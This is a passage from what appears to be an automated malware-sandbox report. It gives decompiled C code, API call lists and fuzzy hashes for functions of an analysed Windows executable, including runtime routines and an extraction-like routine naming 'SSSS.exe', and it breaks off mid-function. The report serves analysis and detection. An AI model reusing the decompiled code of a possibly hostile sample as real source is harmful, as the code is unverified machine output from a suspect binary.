                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1036877536-0
                                                                                                                • Opcode ID: bd43b26425f5343f77386a3bac1946d7476590b870dea5ca9b109c94407f6956
                                                                                                                • Instruction ID: d89bffca894ebc2e3128b5b9f79e046e5bae366338c1fcc1cfe6afb3650dec87
                                                                                                                • Opcode Fuzzy Hash: bd43b26425f5343f77386a3bac1946d7476590b870dea5ca9b109c94407f6956
                                                                                                                • Instruction Fuzzy Hash: E9A145719003869FEB25AF28C8957BEBBE5EF11358F1851AFE495BF381D2388942C750
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC265A, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00EC265A(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00ED3370();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00EC2534( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00EC27F3( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00EC702C(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00EC702C(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00EC702C(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00EC27F3( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00EC3399( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                                                                                                                0x00ec265a
                                                                                                                0x00ec265f
                                                                                                                0x00ec266b
                                                                                                                0x00ec2672
                                                                                                                0x00ec2676
                                                                                                                0x00ec2683
                                                                                                                0x00ec2683
                                                                                                                0x00ec2687
                                                                                                                0x00ec2687
                                                                                                                0x00ec2690
                                                                                                                0x00ec269d
                                                                                                                0x00ec269d
                                                                                                                0x00ec26a1
                                                                                                                0x00ec26a1
                                                                                                                0x00ec26aa
                                                                                                                0x00ec26b8
                                                                                                                0x00ec26b8
                                                                                                                0x00ec26bc
                                                                                                                0x00ec26c3
                                                                                                                0x00ec26c8
                                                                                                                0x00ec26cf
                                                                                                                0x00ec26e5
                                                                                                                0x00ec26d5
                                                                                                                0x00ec26de
                                                                                                                0x00ec26de
                                                                                                                0x00ec2700
                                                                                                                0x00ec2706
                                                                                                                0x00ec270d
                                                                                                                0x00ec2757
                                                                                                                0x00ec275c
                                                                                                                0x00ec2765
                                                                                                                0x00ec2765
                                                                                                                0x00ec276f
                                                                                                                0x00ec2778
                                                                                                                0x00ec2778
                                                                                                                0x00ec2782
                                                                                                                0x00ec278b
                                                                                                                0x00ec278b
                                                                                                                0x00ec279b
                                                                                                                0x00ec279f
                                                                                                                0x00ec27af
                                                                                                                0x00ec27bf
                                                                                                                0x00ec27c5
                                                                                                                0x00ec27cc
                                                                                                                0x00ec27d4
                                                                                                                0x00ec27e1
                                                                                                                0x00ec27e1
                                                                                                                0x00000000
                                                                                                                0x00ec270f
                                                                                                                0x00ec2720
                                                                                                                0x00ec2727
                                                                                                                0x00ec27e6
                                                                                                                0x00ec27f0
                                                                                                                0x00ec27f0
                                                                                                                0x00ec2744
                                                                                                                0x00ec274a
                                                                                                                0x00ec2751
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec2751
                                                                                                                0x00ec270d
                                                                                                                0x00ec26b2
                                                                                                                0x00ec26b6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec26b6
                                                                                                                0x00ec2697
                                                                                                                0x00ec269b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec269b
                                                                                                                0x00ec267d
                                                                                                                0x00ec2681
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00EC2700
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800), ref: 00EC2744
                                                                                                                • SetFileTime.KERNEL32(?,?,?,00000000), ref: 00EC27C5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00EC27CC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$Create$CloseHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2287278272-0
                                                                                                                • Opcode ID: 01ef6e33d54d021e6327caaf861676b80759801052e1ea7fc9940a2db3c158cb
                                                                                                                • Instruction ID: 4704de5c80edc7c7f7d9fe466c90e79d45937e836f5b351dd9bd6cdb22314368
                                                                                                                • Opcode Fuzzy Hash: 01ef6e33d54d021e6327caaf861676b80759801052e1ea7fc9940a2db3c158cb
                                                                                                                • Instruction Fuzzy Hash: 9B41C13114C3819ED721DF24DE85FABBBE4AB85704F04091DB6D0E7180C676DA49DB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE1138, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00EE1138(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xef1558; // 0xf529bb33
				_v8 = _t34 ^ _t70;
				E00ED8DBE(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xbae85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00ED3C6A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00ED4440(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00EDF399(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00EDD5E4(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00EE6AE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                                                                                                0x00ee1140
                                                                                                                0x00ee1147
                                                                                                                0x00ee1153
                                                                                                                0x00ee1158
                                                                                                                0x00ee115d
                                                                                                                0x00ee1162
                                                                                                                0x00ee1162
                                                                                                                0x00ee1165
                                                                                                                0x00ee1167
                                                                                                                0x00ee1167
                                                                                                                0x00ee116c
                                                                                                                0x00ee1185
                                                                                                                0x00ee118b
                                                                                                                0x00ee1190
                                                                                                                0x00ee122f
                                                                                                                0x00ee1233
                                                                                                                0x00ee1238
                                                                                                                0x00ee1238
                                                                                                                0x00ee1254
                                                                                                                0x00ee1254
                                                                                                                0x00ee1196
                                                                                                                0x00ee119e
                                                                                                                0x00ee11a2
                                                                                                                0x00ee11ee
                                                                                                                0x00ee11f0
                                                                                                                0x00ee11f2
                                                                                                                0x00ee11f7
                                                                                                                0x00ee120e
                                                                                                                0x00ee1216
                                                                                                                0x00ee1226
                                                                                                                0x00ee1226
                                                                                                                0x00ee1216
                                                                                                                0x00ee1228
                                                                                                                0x00ee1229
                                                                                                                0x00000000
                                                                                                                0x00ee122e
                                                                                                                0x00ee11a9
                                                                                                                0x00ee11ab
                                                                                                                0x00ee11ad
                                                                                                                0x00ee11b5
                                                                                                                0x00ee11d2
                                                                                                                0x00ee11dc
                                                                                                                0x00ee11e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee11e3
                                                                                                                0x00ee11e9
                                                                                                                0x00ee11e9
                                                                                                                0x00000000
                                                                                                                0x00ee11e9
                                                                                                                0x00ee11b9
                                                                                                                0x00ee11bd
                                                                                                                0x00ee11c2
                                                                                                                0x00ee11c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ee11c8
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,BAE85006,00ED8F4E,00000000,00000000,00ED9F83,?,00ED9F83,?,00000001,00ED8F4E,BAE85006,00000001,00ED9F83,00ED9F83), ref: 00EE1185
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EE120E
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EE1220
                                                                                                                • __freea.LIBCMT ref: 00EE1229
                                                                                                                  • Part of subcall function 00EDD5E4: RtlAllocateHeap.NTDLL(00000000,?,?,?,00ED8A0E,?,0000015D,?,?,?,?,00ED9EEA,000000FF,00000000,?,?), ref: 00EDD616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: c5c6b01434ac7c5228f14f4e76f2c9731d635e63319913c3581072f518b715de
                                                                                                                • Instruction ID: 969f03ea1abf6045132da1c36651254512d564ad0c10d7d1f67639e258c190d0
                                                                                                                • Opcode Fuzzy Hash: c5c6b01434ac7c5228f14f4e76f2c9731d635e63319913c3581072f518b715de
                                                                                                                • Instruction Fuzzy Hash: 0631D271A0024E9FDF249FA6EC41DAE7BA5EB44314F044169FD04E7290E735CD91CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED75E7, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E00ED75E7(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00ED7C36(__ebx, _t30);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00ED4781(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00ED7E38(_t27, _t28, _t29, _t30);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00ED73F1(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E00ED474F(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                                                                                                0x00ed75e7
                                                                                                                0x00ed75e7
                                                                                                                0x00ed75ef
                                                                                                                0x00ed75f2
                                                                                                                0x00ed75f4
                                                                                                                0x00ed75f7
                                                                                                                0x00ed75fa
                                                                                                                0x00ed75fb
                                                                                                                0x00ed75fe
                                                                                                                0x00ed7603
                                                                                                                0x00ed7603
                                                                                                                0x00ed7606
                                                                                                                0x00ed760a
                                                                                                                0x00ed760d
                                                                                                                0x00ed7612
                                                                                                                0x00ed760f
                                                                                                                0x00ed760f
                                                                                                                0x00ed760f
                                                                                                                0x00ed7615
                                                                                                                0x00ed761b
                                                                                                                0x00ed761e
                                                                                                                0x00ed7620
                                                                                                                0x00ed7623
                                                                                                                0x00ed7626
                                                                                                                0x00ed7627
                                                                                                                0x00ed7630
                                                                                                                0x00ed7635
                                                                                                                0x00ed7638
                                                                                                                0x00ed763e
                                                                                                                0x00ed7641
                                                                                                                0x00ed7644
                                                                                                                0x00ed7647
                                                                                                                0x00ed7648
                                                                                                                0x00ed764b
                                                                                                                0x00ed7656
                                                                                                                0x00ed765a
                                                                                                                0x00000000
                                                                                                                0x00ed765a
                                                                                                                0x00ed7661

                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00ED75FE
                                                                                                                  • Part of subcall function 00ED7C36: ___AdjustPointer.LIBCMT ref: 00ED7C80
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00ED7615
                                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00ED7627
                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00ED764B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2633735394-0
                                                                                                                • Opcode ID: 7e662219a409a516f680b86430e03a7120853031bcffaaa422c1d6fc7a09dfb3
                                                                                                                • Instruction ID: 396499f9e500ea51cf5e9a29b2c356a5a582f361ae34827ad5f3536e11312295
                                                                                                                • Opcode Fuzzy Hash: 7e662219a409a516f680b86430e03a7120853031bcffaaa422c1d6fc7a09dfb3
                                                                                                                • Instruction Fuzzy Hash: 91012932004508BFCF125F55CC05EDA7BBAEF49754F145016FD5876221E332E862EBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED6ED4, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED6ED4() {
				void* _t4;
				void* _t8;

				E00ED83B3();
				E00ED8347();
				if(E00ED808A() != 0) {
					_t4 = E00ED725C(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00ED80C6();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                                                                0x00ed6ed4
                                                                                                                0x00ed6ed9
                                                                                                                0x00ed6ee5
                                                                                                                0x00ed6eea
                                                                                                                0x00ed6eef
                                                                                                                0x00ed6ef1
                                                                                                                0x00ed6efc
                                                                                                                0x00ed6ef3
                                                                                                                0x00ed6ef3
                                                                                                                0x00000000
                                                                                                                0x00ed6ef3
                                                                                                                0x00ed6ee7
                                                                                                                0x00ed6ee7
                                                                                                                0x00ed6ee9
                                                                                                                0x00ed6ee9

                                                                                                                APIs
                                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00ED6ED4
                                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00ED6ED9
                                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00ED6EDE
                                                                                                                  • Part of subcall function 00ED808A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00ED809B
                                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00ED6EF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                • String ID:
                                                                                                                • API String ID: 1761009282-0
                                                                                                                • Opcode ID: dd7a9bd8b92fdbfb89dc82044b6a1bd96dd9f702238d5fe0633db0693afd8258
                                                                                                                • Instruction ID: 9f6b7cb4648de99f96d06b208a9c354d91d0f2a72806127ad2f54c072b767d20
                                                                                                                • Opcode Fuzzy Hash: dd7a9bd8b92fdbfb89dc82044b6a1bd96dd9f702238d5fe0633db0693afd8258
                                                                                                                • Instruction Fuzzy Hash: F0C04C9C014151983C107AB593135AD13D0CEA2BCC78434C7BC953BB47ED06454F9433
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECCD25, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E00ECCD25(signed int __edx, void* __eflags) {
				char _v252;
				char _v256;
				char _v264;
				char _v380;
				char _v388;
				char _v392;
				char _v408;
				char _v415;
				signed int _v416;
				char _v418;
				char _v420;
				char _v428;
				char _v434;
				signed int _v438;
				char _v444;
				char _v448;
				signed int _v450;
				intOrPtr _t47;
				signed int _t49;
				signed int _t50;
				intOrPtr _t51;
				signed int _t60;
				signed int _t61;
				signed int _t66;
				signed int _t67;
				signed char _t74;
				void* _t82;
				signed int _t90;
				signed int _t91;
				signed char _t93;
				void* _t105;
				signed int _t108;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed char* _t119;
				signed int _t121;
				signed int _t122;
				signed int _t125;
				signed char* _t127;
				signed int _t130;
				void* _t136;
				signed int _t138;
				void* _t145;
				signed int _t149;
				signed int _t152;
				signed int _t154;

				_t129 = __edx;
				_t47 =  *0xefb588; // 0x31ef6f0
				 *(_t47 + 0x40) =  *(_t47 + 0x40) & 0xfffffffe;
				_push(_t116);
				E00EC9C4D(__edx);
				_t119 =  *0xf0b598; // 0x31dc72d
				_t138 = 0;
				_push(0xc);
				_t117 = _t116 | 0xffffffff;
				_pop(0);
				if( *0xf0c835 == 0) {
					_t49 =  *0xf0b5a0; // 0x116
					do {
						_t49 = _t49 + _t117;
						__eflags = _t49;
						 *0xf0b5a0 = _t49;
						asm("adc [0xf0b5a4], ebx");
						if(__eflags < 0) {
							L24:
							_t50 = E00ECA1D6(_t49, _t129);
							_t119 =  *0xf0b598; // 0x31dc72d
							_t129 = _t50;
							_t49 =  *0xf0b5a0; // 0x116
							goto L25;
						}
						if(__eflags > 0) {
							L23:
							_t129 =  *_t119 & 0x000000ff;
							_t119 =  &(_t119[1]);
							 *0xf0b598 = _t119;
							goto L25;
						}
						__eflags = _t49;
						if(_t49 < 0) {
							goto L24;
						}
						goto L23;
						L25:
						 *(_t145 + _t138 + 0x1c) = _t129;
						_t138 = _t138 + 1;
						__eflags = _t138;
					} while (_t138 < 0);
					L26:
					_t51 =  *0xefb588; // 0x31ef6f0
					 *(_t51 + 0x40) =  *(_t51 + 0x40) | 0x00000001;
					E00ECA44D();
					_t132 = 0xf0c6cc;
					if( *0xefb53c == 0) {
						L35:
						while( *0xf0c7cc != 0 || E00EC7712(1, ?str?, _t132) != 0) {
							_push(0x80);
							_push( &_v256);
							E00EC56BA(_t132, _t129);
							_push(0x80);
							_push( &_v392);
							_push( &_v264);
							if( *0xf0c835 == 0) {
								E00EC799C();
								_t60 = E00ECD144( &_v420,  &_v392);
								__eflags = _t60;
								_t61 = _t60 & 0xffffff00 | _t60 != 0x00000000;
								_v438 = _t61;
								__eflags = _t61;
								if(_t61 == 0) {
									L46:
									E00EC5878( &_v252, 0x100);
									E00EC5878( &_v388, 0x80);
									if(_v434 == 0) {
										__eflags = 0;
										L53:
										__eflags =  *0xf0c835;
										if( *0xf0c835 == 0) {
											L64:
											_t66 = 0;
											L65:
											return _t66;
										}
										_t130 =  *0xefb55c; // 0x0
										_t121 =  *0xefb558; // 0x0
										__eflags = _t130;
										if(__eflags > 0) {
											L58:
											_t122 = _t121 + 0xfffffff6;
											 *0xefb558 = _t122;
											asm("adc edx, ebx");
											 *0xefb55c = _t130;
											__eflags =  *0xf0b5a4 - _t130; // 0x0
											if(__eflags > 0) {
												L61:
												_t67 = _t122;
												L62:
												__eflags = _t67;
												if(_t67 != 0) {
													E00ECD474( *0xf0b598, _t67, 0xf0c840);
												}
												goto L64;
											}
											_t67 =  *0xf0b5a0; // 0x116
											if(__eflags < 0) {
												goto L62;
											}
											__eflags = _t67 - _t122;
											if(_t67 < _t122) {
												goto L62;
											}
											goto L61;
										}
										if(__eflags < 0) {
											L57:
											_push(2);
											L50:
											_pop(_t66);
											goto L65;
										}
										__eflags = _t121 - 0xa;
										if(_t121 >= 0xa) {
											goto L58;
										}
										goto L57;
									}
									E00EC56A7(_t132);
									_t170 =  *0xefb540;
									_push("SSSS.exe");
									_push(0xf19f02);
									if( *0xefb540 != 0) {
										_push(6);
										E00EC173F(__eflags);
										goto L53;
									}
									_push(0x7d);
									E00EC173F(_t170);
									continue;
								}
								_t74 = E00EC65DE( &_v252);
								asm("sbb al, al");
								__eflags =  ~_t74 + 1;
								if( ~_t74 + 1 == 0) {
									goto L46;
								}
								E00EC79D4( &_v252,  &_v380, 0x80);
								_t82 = E00ECD144( &_v420,  &_v392);
								L45:
								_v418 = _t82 != 0;
								goto L46;
							}
							E00EC799C();
							E00ECD4C1( *0xf0c838,  &_v392,  &_v408,  &_v428, 0xf0c840);
							_t90 = E00ED51D4( &_v444,  &_v448, 2);
							_t145 = _t145 + 0xc;
							_t91 = _t90 & 0xffffff00 | _t90 != 0x00000000;
							_v450 = _t91;
							if(_t91 == 0) {
								goto L46;
							}
							_t93 = E00EC65DE( &_v252);
							asm("sbb al, al");
							if( ~_t93 + 1 == 0) {
								goto L46;
							}
							E00EC79D4( &_v252,  &_v380, 0x80);
							E00ECD4C1( *0xf0c838,  &_v392,  &_v408,  &_v428, 0xf0c840);
							_t82 = E00ED51D4( &_v444,  &_v448, 2);
							_t145 = _t145 + 0xc;
							goto L45;
						}
						_push(9);
						goto L50;
					}
					 *0xefb53c =  *0xefb53c & 0x00000000;
					if( *0xf15d14 == 0) {
						__eflags =  *0xf0c7cc;
						if( *0xf0c7cc == 0) {
							L33:
							_t105 = E00EC7733();
							 *0xefb540 = 0;
							if(_t105 == 0) {
								goto L35;
							}
							L34:
							 *0xefb540 = 1;
							goto L35;
						}
						E00EC56A7(0xf0c6cc);
						L32:
						if( *0xf0c7cc != 0) {
							goto L34;
						}
						goto L33;
					}
					if( *0xf0c7cc != 0) {
						goto L34;
					}
					_t125 = 0x40;
					memcpy(0xf0c6cc, 0xf15c14, _t125 << 2);
					_t145 = _t145 + 0xc;
					asm("movsw");
					_t132 = 0xf0c6cc;
					goto L32;
				}
				_t108 =  *0xf0c838; // 0x0
				_t136 = 4 + (_t108 & 0x00000003) * 4;
				_t110 =  *0xf0b5a0; // 0x116
				if(_t136 == 0) {
					L8:
					_t111 = _t110 + _t117;
					_t152 = _t111;
					 *0xf0b5a0 = _t111;
					asm("adc [0xf0b5a4], ebx");
					if(_t152 < 0 || _t152 <= 0 && _t111 < 0) {
						_t112 = E00ECA1D6(_t111, _t129);
						_t127 =  *0xf0b598; // 0x31dc72d
						_t129 = _t112;
						_t111 =  *0xf0b5a0; // 0x116
					} else {
						_t129 =  *_t119;
						_t127 =  &(_t119[1]);
						 *0xf0b598 = _t127;
					}
					_t113 = _t111 + _t117;
					_t154 = _t113;
					_v416 = _t129;
					 *0xf0b5a0 = _t113;
